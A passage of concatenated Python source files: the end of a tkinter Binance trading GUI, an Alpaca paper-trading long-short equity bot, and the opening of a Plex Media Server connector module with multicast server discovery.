if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
def Scale_SL_change(self,value):
global GPSP_Tmp
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('Binance trading')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Account',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Balances',command=clicked_blns)
new_item.add_command(label='Orders',command=clicked_Ordrs)
menu.add_cascade(label='Account', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Start Program. Connecting to Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance time: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Reading Binance markets ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set(grSmb)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance markets loaded.'
app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Program ready to work!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Current chart: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Current market: ' + MS + '. Current pairs filter: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Current pair: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Settings file is missing. Enter API_KEYS in the Account menu to use the program'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Settings file is empty. Enter API_KEYS in the Account menu to use the program'
else:
my_file_Account = open("iTrader.cfg", "r")
API_KEY_s = ''
API_SECRET_s = ''
l = 0
while True:
sss00 = my_file_Account.readline()
if not sss00:
break
if l == 0:
API_KEY_s = sss00.replace ("\n", "")
elif l == 1:
API_SECRET_s = sss00.replace ("\n", "")
l +=1
my_file_Account.close()
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Settings file read successfully.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Settings file read with errors. Enter API_KEYS in the Account menu to use the program'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT account. Permissions: " + str(myListAcc['permissions']) + '. CanDeposit: ' + str(myListAcc['canDeposit'])
sys_msg += str(". canWithdraw: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
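# Window <Configure> handler: re-place all widgets relative to the new window size and remember the chart area dimensions in grH/grW.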
def config(event):
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.List_Ord.place(x=210, y=10, width=event.width-490, height=100)
app.List_Ord_Scrl.place(height=100,width=10,x=event.width-280,y=10)
app.Tree_Ord.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Ord_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-320,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
app.label_CmdOrd.place(height=250,width=198,x=0,y=event.height-320-260) #heigth:h = event.height-320-260
app.text_Sys.place(height=150,width=event.width-30,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-20,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
long-short.py
|
import os
import sys
import datetime
import threading
import pandas as pd
import alpaca_trade_api as tradeapi
import time
from alpaca_trade_api.rest import TimeFrame
API_KEY = os.getenv('PAPER_KEY')
API_SECRET = os.getenv('PAPER_SECRET')
APCA_API_BASE_URL = "https://paper-api.alpaca.markets"
class LongShort:
def __init__(self):
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, APCA_API_BASE_URL, 'v2')
stockUniverse = ['DOMO', 'TLRY', 'SQ', 'MRO', 'AAPL', 'GM', 'SNAP', 'SHOP',
'SPLK', 'BA', 'AMZN', 'SUI', 'SUN', 'TSLA', 'CGC', 'SPWR',
'NIO', 'CAT', 'MSFT', 'PANW', 'OKTA', 'TWTR', 'TM',
'ATVI', 'GS', 'BAC', 'MS', 'TWLO', 'QCOM', ]
# Format the allStocks variable for use in the class.
self.allStocks = []
for stock in stockUniverse:
self.allStocks.append([stock, 0])
self.long = []
self.short = []
self.qShort = None
self.qLong = None
self.adjustedQLong = None
self.adjustedQShort = None
self.blacklist = set()
self.longAmount = 0
self.shortAmount = 0
self.timeToClose = None
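# Main loop: cancel stale orders, wait for the market to open, flatten yesterday's positions, then rebalance every minute until 15 minutes before the close.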
def run(self):
# First, cancel any existing orders so they don't impact our buying power.
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
# close positions from the previous day
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(float(position.qty))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=[qty, position.symbol, orderSide, respSO])
tSubmitOrder.start()
tSubmitOrder.join()
# Rebalance the portfolio every minute, making necessary trades.
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if(self.timeToClose < (60 * 15)):
# Close all positions when 15 minutes til market close.
print("Market closing soon. Closing positions.")
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)
# quit program after market close
sys.exit('Market closed.')
else:
# Rebalance the portfolio.
tRebalance = threading.Thread(target=self.rebalance)
tRebalance.start()
tRebalance.join()
time.sleep(60)
# Wait for market to open.
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while(not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
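# Rebalance: re-rank the universe, cancel open orders, clear or resize existing positions, then batch-order the remaining long and short lists, retrying rejected orders with adjusted quantities.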
def rebalance(self):
tRerank = threading.Thread(target=self.rerank)
tRerank.start()
tRerank.join()
# Clear existing orders again.
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
print("We are taking a long position in: " + str(self.long))
print("We are taking a short position in: " + str(self.short))
# Remove positions that are no longer in the short or long list, and make a list of positions that do not need to change. Adjust position quantities if needed.
executed = [[], []]
positions = self.alpaca.list_positions()
self.blacklist.clear()
for position in positions:
if(self.long.count(position.symbol) == 0):
# Position is not in long list.
if(self.short.count(position.symbol) == 0):
# Position not in short list either. Clear position.
if(position.side == "long"):
side = "sell"
else:
side = "buy"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(float(position.qty)), position.symbol, side, respSO])
tSO.start()
tSO.join()
else:
# Position in short list.
if(position.side == "long"):
# Position changed from long to short. Clear long position to prepare for short position.
side = "sell"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[float(position.qty), position.symbol, side, respSO])
tSO.start()
tSO.join()
else:
if(abs(float(position.qty)) == self.qShort):
# Position is where we want it. Pass for now.
pass
else:
# Need to adjust position amount
diff = abs(float(position.qty)) - self.qShort
if(diff > 0):
# Too many short positions. Buy some back to rebalance.
side = "buy"
else:
# Too few short positions. Sell some more.
side = "sell"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(diff), position.symbol, side, respSO])
tSO.start()
tSO.join()
executed[1].append(position.symbol)
self.blacklist.add(position.symbol)
else:
# Position in long list.
if(position.side == "short"):
# Position changed from short to long. Clear short position to prepare for long position.
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(float(position.qty)), position.symbol, "buy", respSO])
tSO.start()
tSO.join()
else:
if(float(position.qty) == self.qLong):
# Position is where we want it. Pass for now.
pass
else:
# Need to adjust position amount.
diff = abs(float(position.qty)) - self.qLong
if(diff > 0):
# Too many long positions. Sell some to rebalance.
side = "sell"
else:
# Too few long positions. Buy some more.
side = "buy"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(diff), position.symbol, side, respSO])
tSO.start()
tSO.join()
executed[0].append(position.symbol)
self.blacklist.add(position.symbol)
# Send orders to all remaining stocks in the long and short list.
respSendBOLong = []
tSendBOLong = threading.Thread(target=self.sendBatchOrder, args=[self.qLong, self.long, "buy", respSendBOLong])
tSendBOLong.start()
tSendBOLong.join()
respSendBOLong[0][0] += executed[0]
if(len(respSendBOLong[0][1]) > 0):
# Handle rejected/incomplete orders and determine new quantities to purchase.
respGetTPLong = []
tGetTPLong = threading.Thread(target=self.getTotalPrice, args=[respSendBOLong[0][0], respGetTPLong])
tGetTPLong.start()
tGetTPLong.join()
if (respGetTPLong[0] > 0):
self.adjustedQLong = round(self.longAmount / respGetTPLong[0], 2)
else:
self.adjustedQLong = -1
else:
self.adjustedQLong = -1
respSendBOShort = []
tSendBOShort = threading.Thread(target=self.sendBatchOrder, args=[self.qShort, self.short, "sell", respSendBOShort])
tSendBOShort.start()
tSendBOShort.join()
respSendBOShort[0][0] += executed[1]
if(len(respSendBOShort[0][1]) > 0):
# Handle rejected/incomplete orders and determine new quantities to purchase.
respGetTPShort = []
tGetTPShort = threading.Thread(target=self.getTotalPrice, args=[respSendBOShort[0][0], respGetTPShort])
tGetTPShort.start()
tGetTPShort.join()
if(respGetTPShort[0] > 0):
self.adjustedQShort = round(self.shortAmount / respGetTPShort[0], 2)
else:
self.adjustedQShort = -1
else:
self.adjustedQShort = -1
# Reorder stocks that didn't throw an error so that the equity quota is reached.
if(self.adjustedQLong > -1):
self.qLong = self.adjustedQLong - self.qLong
for stock in respSendBOLong[0][0]:
respResendBOLong = []
tResendBOLong = threading.Thread(target=self.submitOrder, args=[self.qLong, stock, "buy", respResendBOLong])
tResendBOLong.start()
tResendBOLong.join()
if(self.adjustedQShort > -1):
self.qShort = self.adjustedQShort - self.qShort
for stock in respSendBOShort[0][0]:
respResendBOShort = []
tResendBOShort = threading.Thread(target=self.submitOrder, args=[self.qShort, stock, "sell", respResendBOShort])
tResendBOShort.start()
tResendBOShort.join()
# Re-rank all stocks to adjust longs and shorts.
def rerank(self):
tRank = threading.Thread(target=self.rank)
tRank.start()
tRank.join()
# Grabs the top and bottom quarter of the sorted stock list to get the long and short lists.
longShortAmount = len(self.allStocks) // 4
self.long = []
self.short = []
for i, stockField in enumerate(self.allStocks):
if(i < longShortAmount):
self.short.append(stockField[0])
elif(i > (len(self.allStocks) - 1 - longShortAmount)):
self.long.append(stockField[0])
else:
continue
# Determine amount to long/short based on total stock price of each bucket.
equity = int(float(self.alpaca.get_account().equity))
# TODO: set back to 30% once equity reaches $2,000
self.shortAmount = equity * 0
self.longAmount = equity - self.shortAmount
respGetTPLong = []
tGetTPLong = threading.Thread(target=self.getTotalPrice, args=[self.long, respGetTPLong])
tGetTPLong.start()
tGetTPLong.join()
respGetTPShort = []
tGetTPShort = threading.Thread(target=self.getTotalPrice, args=[self.short, respGetTPShort])
tGetTPShort.start()
tGetTPShort.join()
self.qLong = round(self.longAmount / respGetTPLong[0], 2)
self.qShort = round(self.shortAmount / respGetTPShort[0], 2)
# Get the total price of the array of input stocks.
def getTotalPrice(self, stocks, resp):
totalPrice = 0
for stock in stocks:
bars = self.alpaca.get_bars(stock, TimeFrame.Minute,
pd.Timestamp('now').date(),
pd.Timestamp('now').date(), limit=1,
adjustment='raw')
totalPrice += bars[0].c
resp.append(totalPrice)
# Submit a batch order that returns completed and uncompleted orders.
def sendBatchOrder(self, qty, stocks, side, resp):
executed = []
incomplete = []
for stock in stocks:
if(self.blacklist.isdisjoint({stock})):
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=[qty, stock, side, respSO])
tSubmitOrder.start()
tSubmitOrder.join()
if(not respSO[0]):
# Stock order did not go through, add it to incomplete.
incomplete.append(stock)
else:
executed.append(stock)
respSO.clear()
resp.append([executed, incomplete])
# Submit an order if quantity is above 0.
def submitOrder(self, qty, stock, side, resp):
if(qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except tradeapi.rest.APIError as e:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through. Error: " + e._error['message'])
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
# Get percent changes of the stock prices over the past 10 minutes.
def getPercentChanges(self):
length = 10
for i, stock in enumerate(self.allStocks):
bars = self.alpaca.get_bars(stock[0], TimeFrame.Minute,
pd.Timestamp('now').date(),
pd.Timestamp('now').date(), limit=length,
adjustment='raw')
self.allStocks[i][1] = (bars[len(bars) - 1].c - bars[0].o) / bars[0].o
# Mechanism used to rank the stocks, the basis of the Long-Short Equity Strategy.
def rank(self):
# Ranks all stocks by percent change over the past 10 minutes (higher is better).
tGetPC = threading.Thread(target=self.getPercentChanges)
tGetPC.start()
tGetPC.join()
# Sort the stocks in place by the percent change field (marked by pc).
self.allStocks.sort(key=lambda x: x[1])
# Run the LongShort class
ls = LongShort()
ls.run()
|
PlexAPI.py
|
#!/usr/bin/env python
"""
Collection of "connector functions" to Plex Media Server/MyPlex
PlexGDM:
loosely based on hippojay's plexGDM:
https://github.com/hippojay/script.plexbmc.helper... /resources/lib/plexgdm.py
Plex Media Server communication:
source (somewhat): https://github.com/hippojay/plugin.video.plexbmc
later converted from httplib to urllib2
Transcoder support:
PlexAPI_getTranscodePath() based on getTranscodeURL from pyplex/plexAPI
https://github.com/megawubs/pyplex/blob/master/plexAPI/info.py
MyPlex - Basic Authentication:
http://www.voidspace.org.uk/python/articles/urllib2.shtml
http://www.voidspace.org.uk/python/articles/authentication.shtml
http://stackoverflow.com/questions/2407126/python-urllib2-basic-auth-problem
http://stackoverflow.com/questions/111945/is-there-any-way-to-do-http-put-in-python
(and others...)
"""
import sys
import struct
import time
import urllib2, httplib, socket, StringIO, gzip
from threading import Thread
import Queue
import traceback
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
from urllib import urlencode, quote_plus
from Version import __VERSION__
from Debug import * # dprint(), prettyXML()
"""
storage for PMS addresses and additional information - now per aTV! (replaces global PMS_list)
syntax: PMS[<ATV_UDID>][PMS_UUID][<data>]
data: name, ip, ...type (local, myplex)
"""
g_PMS = {}
"""
Plex Media Server handling
parameters:
ATV_udid
uuid - PMS ID
name, scheme, ip, port, type, owned, token
"""
def declarePMS(ATV_udid, uuid, name, scheme, ip, port):
# store PMS information in g_PMS database
global g_PMS
if not ATV_udid in g_PMS:
g_PMS[ATV_udid] = {}
address = ip + ':' + port
baseURL = scheme+'://'+ip+':'+port
g_PMS[ATV_udid][uuid] = { 'name': name,
'scheme':scheme, 'ip': ip , 'port': port,
'address': address,
'baseURL': baseURL,
'local': '1',
'owned': '1',
'accesstoken': '',
'enableGzip': False
}
def updatePMSProperty(ATV_udid, uuid, tag, value):
# set property element of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
g_PMS[ATV_udid][uuid][tag] = value
def getPMSProperty(ATV_udid, uuid, tag):
# get name of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
return g_PMS[ATV_udid][uuid].get(tag, '')
def getPMSFromAddress(ATV_udid, address):
# find PMS by IP, return UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
for uuid in g_PMS[ATV_udid]:
if address in g_PMS[ATV_udid][uuid].get('address', None):
return uuid
return '' # IP not found
def getPMSAddress(ATV_udid, uuid):
# get address of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
return g_PMS[ATV_udid][uuid]['ip'] + ':' + g_PMS[ATV_udid][uuid]['port']
def getPMSCount(ATV_udid):
# get count of discovered PMS by UUID
if not ATV_udid in g_PMS:
return 0 # no server known for this aTV
return len(g_PMS[ATV_udid])
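# --- Illustrative sketch (hedged) --------------------------------------------
# A minimal example of how the g_PMS helpers above fit together. The aTV UDID,
# PMS uuid and token below are invented placeholders.
def _example_g_PMS_usage():
    declarePMS('atv-0001', 'pms-uuid-1', 'Living Room', 'http', '192.168.0.10', '32400')
    updatePMSProperty('atv-0001', 'pms-uuid-1', 'accesstoken', 'some-token')
    name = getPMSProperty('atv-0001', 'pms-uuid-1', 'name')    # 'Living Room'
    addr = getPMSAddress('atv-0001', 'pms-uuid-1')             # '192.168.0.10:32400'
    count = getPMSCount('atv-0001')                            # 1
    return name, addr, count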
"""
PlexGDM
parameters:
none
result:
PMS_list - dict() of PMSs found
"""
IP_PlexGDM = '239.0.0.250' # multicast to PMS
Port_PlexGDM = 32414
Msg_PlexGDM = 'M-SEARCH * HTTP/1.0'
def PlexGDM():
dprint(__name__, 0, "***")
dprint(__name__, 0, "PlexGDM - looking up Plex Media Server")
dprint(__name__, 0, "***")
# setup socket for discovery -> multicast message
GDM = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
GDM.settimeout(1.0)
# Set the time-to-live for messages to 1 for local network
ttl = struct.pack('b', 1)
GDM.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
returnData = []
try:
# Send data to the multicast group
dprint(__name__, 1, "Sending discovery message: {0}", Msg_PlexGDM)
GDM.sendto(Msg_PlexGDM, (IP_PlexGDM, Port_PlexGDM))
# Look for responses from all recipients
while True:
try:
data, server = GDM.recvfrom(1024)
dprint(__name__, 1, "Received data from {0}", server)
dprint(__name__, 1, "Data received:\n {0}", data)
returnData.append( { 'from' : server,
'data' : data } )
except socket.timeout:
break
finally:
GDM.close()
discovery_complete = True
PMS_list = {}
if returnData:
for response in returnData:
update = { 'ip' : response.get('from')[0] }
# Check if we had a positive HTTP response
if "200 OK" in response.get('data'):
for each in response.get('data').split('\n'):
# decode response data
update['discovery'] = "auto"
#update['owned']='1'
#update['master']= 1
#update['role']='master'
if "Content-Type:" in each:
update['content-type'] = each.split(':')[1].strip()
elif "Resource-Identifier:" in each:
update['uuid'] = each.split(':')[1].strip()
elif "Name:" in each:
update['serverName'] = each.split(':')[1].strip().decode('utf-8', 'replace') # store in utf-8
elif "Port:" in each:
update['port'] = each.split(':')[1].strip()
elif "Updated-At:" in each:
update['updated'] = each.split(':')[1].strip()
elif "Version:" in each:
update['version'] = each.split(':')[1].strip()
PMS_list[update['uuid']] = update
if PMS_list=={}:
dprint(__name__, 0, "GDM: No servers discovered")
else:
dprint(__name__, 0, "GDM: Servers discovered: {0}", len(PMS_list))
for uuid in PMS_list:
dprint(__name__, 1, "{0} {1}:{2}", PMS_list[uuid]['serverName'], PMS_list[uuid]['ip'], PMS_list[uuid]['port'])
return PMS_list
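# --- Illustrative sketch (hedged) --------------------------------------------
# Example of consuming the PMS_list returned by PlexGDM(); the keys used here
# ('serverName', 'ip', 'port') follow the response parsing above.
def _example_PlexGDM_usage():
    PMS_list = PlexGDM()
    for uuid in PMS_list:
        dprint(__name__, 0, "found {0} at {1}:{2}",
               PMS_list[uuid]['serverName'], PMS_list[uuid]['ip'], PMS_list[uuid]['port'])
    return PMS_list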
"""
discoverPMS
parameters:
ATV_udid
CSettings - for manual PMS configuration. This one looks strange.
IP_self
optional:
tokenDict - dictionary of tokens for MyPlex, PlexHome
result:
g_PMS database for ATV_udid
"""
def discoverPMS(ATV_udid, CSettings, IP_self, tokenDict={}):
global g_PMS
g_PMS[ATV_udid] = {}
# install plex.tv "virtual" PMS - for myPlex, PlexHome
declarePMS(ATV_udid, 'plex.tv', 'plex.tv', 'https', 'plex.tv', '443')
updatePMSProperty(ATV_udid, 'plex.tv', 'local', '-')
updatePMSProperty(ATV_udid, 'plex.tv', 'owned', '-')
updatePMSProperty(ATV_udid, 'plex.tv', 'accesstoken', tokenDict.get('MyPlex', ''))
#debug
#declarePMS(ATV_udid, '2ndServer', '2ndServer', 'http', '192.168.178.22', '32400', 'local', '1', 'token')
#declarePMS(ATV_udid, 'remoteServer', 'remoteServer', 'http', '127.0.0.1', '1234', 'myplex', '1', 'token')
#debug
if 'PlexHome' in tokenDict:
authtoken = tokenDict.get('PlexHome')
else:
authtoken = tokenDict.get('MyPlex', '')
if authtoken=='':
# not logged into myPlex
# local PMS
if CSettings.getSetting('enable_plexgdm')=='False':
# defined in setting.cfg
